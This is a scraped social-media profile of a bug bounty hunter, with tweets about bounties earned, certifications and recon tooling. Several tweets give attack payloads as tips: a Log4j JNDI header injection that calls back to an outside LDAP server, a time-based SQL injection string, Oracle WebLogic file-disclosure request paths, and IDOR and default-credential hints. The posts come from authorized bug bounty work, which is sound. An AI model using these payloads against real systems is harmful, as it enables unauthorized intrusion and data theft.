Ravindra Lakhara 🇮🇳
@RootxRavi
Followers
3,707
Following
449
Media
337
Statuses
1,274
Building & | CRTP | eJPT | eCPPTv2 | eWPTX | eMAPT | SRT | Yogosha Top 20 Hacker | Bugcrowd Top 250 | Open for freelance projects
India
Joined October 2022
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
オリンピック
• 607526 Tweets
Christians
• 304515 Tweets
花火大会
• 184581 Tweets
グラブル
• 90328 Tweets
Endrick
• 78843 Tweets
NuNew Sing With Piano
• 71009 Tweets
Itália
• 63115 Tweets
バレーボール
• 48882 Tweets
#withMUSIC
• 34452 Tweets
#アークナイツハニバ2024
• 28950 Tweets
#AkatsukiJapan
• 21238 Tweets
永山選手
• 17429 Tweets
#ぱかライブTV
• 17317 Tweets
#VoleiNaGlobo
• 16157 Tweets
Darlan
• 15830 Tweets
フルセット
• 14764 Tweets
コラボガチャ
• 11887 Tweets
花火の音
• 11818 Tweets
Flávio
• 11070 Tweets
男子バスケ
• 11004 Tweets
Pinned Tweet
A new Tool Added in
@recon_sage
!
Introducing Fast Subdomain Scanner 🚀
Scan subdomains for a domain in a click for FREE!
Tool link in the comments:
21
70
272
Easy P1 🙃
1: Collect all the Js files by using the developer tool on mozila
2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool
3: Now check manually sensitive keyword js file
#bugbounty
#bugbountytips
#security
32
339
1K
Easy P1 🔥
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2
#bugbountytips
#bugbounty
#security
16
132
616
Log4j 🙌 Application was running java
Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty
#bugbountytips
#Security
21
114
566
🙃
1: Gather all the POST parameters using
@BurpBounty
Pro Extension or using Param Miner Tool
2: Use SQLmap or intruder list on each parameter
Payload : (select*from(select(sleep(5)))a)
#bugbountytips
#bugbounty
#hacking
#pentesting
18
163
539
Just scored a 4 Digit Bounty on
@YogoshaOfficial
1 : Get all the URL from wayback / Gau
2 : Filter out the js file using httpx
3 : Check Mnauly all the js file or you can use nuclei template or used
@trufflesec
chrome extension
#BugBounty
#bugbountytips
18
110
411
Oracle WebLogic Server LFI
#Bogbounty
#bugbountytips
#bugbountytip
Payload used :
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml
6
67
266
Easy P1 😀
#bugbountytips
#bugbounty
Endpoint
/elmah
/ELMAH
or you can use the below Template to find out the issue
6
56
259
3 RCE on the VDP program
- Found that the website is using the Oracle WebLogic Server
- Nuclei template used: CVE-2019-2729.yaml
- For exploitation:
#BugBounty
#bugbountytips
#bugbountytip
11
47
197
8
16
158
I and
@0xAyub
earned $1,000 for my submission on
@bugcrowd
#ItTakesACrowd
#BugBounty
No tip is needed for subdomain takeover pretty strate forward Vulnerability
Template use for detection: http/takeovers/pantheon-takeover.yaml
11
12
144
just started working on
@recon_sage
with
@aniket_c333
, a platform to automate all your recon needs
join the waitlist to get notified about early access!
[waitlist link in comment]
#buildinpublic
#security
#bugbounty
7
19
138
Here we go, Weekend Stats:
1. P1: Auth Bypass
2. P3: Sensitive Document exposed (Private & Confidential) and JS file Data Leak
3. P4: Misconfiguration
12
3
135
3
51
130
Me &
@krishnsec
earned $$$ for IDOR submission on
@bugcrowd
#ItTakesACrowd
Bug Name: IDOR allows unauthorized access to another user's profile image on
https://xyz(.)com/api/v4/media/<ID-1111>/profileimage/
Simply substitute "ID" with "Victim ID"
#BugBounty
#security
8
8
125
@Jayesh25_
Wanted to add something here if the swagger instance is not vulnerable to XSS, go for the HTML Injection it will be accepted as P3/ P5
Paylaod
3
21
120
Rewarded 3-digit Bounty for IDOR leads to Mass Username / Email Enumeration
1: I was testing the Forgot password page ( it was Developer Account )
2: I got the password reset link in an email like this
( )
#bugbountytips
#bugbounty
#security
4
43
112
CVE-2022-47003 Mura CMS - Authentication Bypass
Nuclei template :
#bugbountytips
#bugbountytip
#Security
#testing
3
19
84
#Goalfor2023
1-Want to join
@cobalt_io
2-100k bounty ( at least 10k bounty from
@synack
)
3-More collaboration with
@krishnsec
♥️
4-Home for family 🏠
5-Focus on p1 ( Recon )
6-Under 200 on
@Bugcrowd
7- More bike trips with friends 🏍️
#BugBounty
4
6
79
5
0
76
7
0
67
13
2
70
I'm thrilled to announce that I've successfully passed the Certified Red Team Professional (CRTP) exam 🚀 I’m eager to leverage this expertise to enhance cybersecurity strategies and protect against emerging threats. thank you to
@nikhil_mitt
@alteredsecurity
Security for course
9
0
56
Focus on your goal…
Everything else is just a distraction!
3
2
50
Happy Birthday bhai ❤️❤️💯
@krishnsec
Thanks for supporting and motivating me in Bug bounty
#brocode
#p4lover
😹
11
2
51
I’m happy to share that I’m starting a new position as Associate SME - Exposure Management at NetSentries Technologies!
18
0
53
Bhagwat Geeta Says: You have nothing to lose, Because Nothing is yours !
7
3
43
Here we started Again
@krishnsec
Many more to Come 🔥
Rewarded 500$ on VDP For Weak/Default Credentials
Username: user
Password: pass
#bugbountytips
#bugbounty
#security
#infosec
1
0
20
Just got a reward for a vulnerability submitted on
@yeswehack
-- Improper Access Control - Generic (CWE-284).
#YesWeRHackers
2
1
40
The one i am using right now is
gau or katana or waymore -> urldedupe -> qsreplace -> uro -> dalfox / knoxss
#bugbountytips
#bugbounty
0
0
2
0
6
39
5
2
38
P1 Sabke Nikalenge, nikalenge unke jo yaha pe khada rahega 🤣🙌
8
2
37
here we go
@krishnsec
❤️
Bhai mil kar jo maja aya hai na only
@ReebootToInit5
can explain 🤪😜😜😜😝😝😝
5
2
37
I'm pleased to announce that I've attained the Certified Multi-Cloud Red Teaming Analyst Badge from
@cyberwarfarelab
#cloudsecurity
#cloud
#AWS
#GCP
#azure
5
1
27
How many bugs are playing hide-and-seek, avoiding their resolution like masters of mischief?
#BugBounty
6
0
27
Subdomain Scanner:
Please do check it out
Any feedback is appreciated! 🙌
@aniket_c333
@Namancdr
@recon_sage
🚀
2
5
22
6
0
23
Here we go 😍
Hacker Cup Week 2: Check out the latest standings for a glimpse into the exceptional skills driving the competition forward!
🏆 Top 8 teams:
𝟏: {"teamName":12345}
𝟐: Jujutsu Hackers
𝟑: Flysec
𝟒: TESS's Squad
𝟓: Tamil Pasanga
𝟔: Str4Hat Pirates
𝟕: The Boys
𝟖: ByteHunters
3
7
86
2
0
22
Kudos to Bsides Odisha for their quick decision upon the recent conflict raised due to the speaker’s past controversial tweet. Don’t spread hate 🩷🤟
@3ncryptSaan
@bsidesodisha
1
1
21
Yes
149
No
13
8
4
19
6: Bypassed the Rate limit mechanism using the Nullbyte & IP Rotate burp Extension
#bugbountytips
#bugbounty
#security
0
5
19
4
0
17
Happy to share that I have provisionally passed the
#eMAPT
certification.
Thanks,
@eLearnSecurity
&
@ine
really enjoyed the exam scenario of building vulnerable android applications from scratch to hack other vulnerable applications.
2
0
16
Happy Guru Purnima! I'm forever grateful for the wisdom and inspiration my Gurus have given me. With immense gratitude, I celebrate the invaluable lessons learned from them. My deepest thanks to all my Gurus for guiding me. 🌠🌌
1
0
16
4
1
15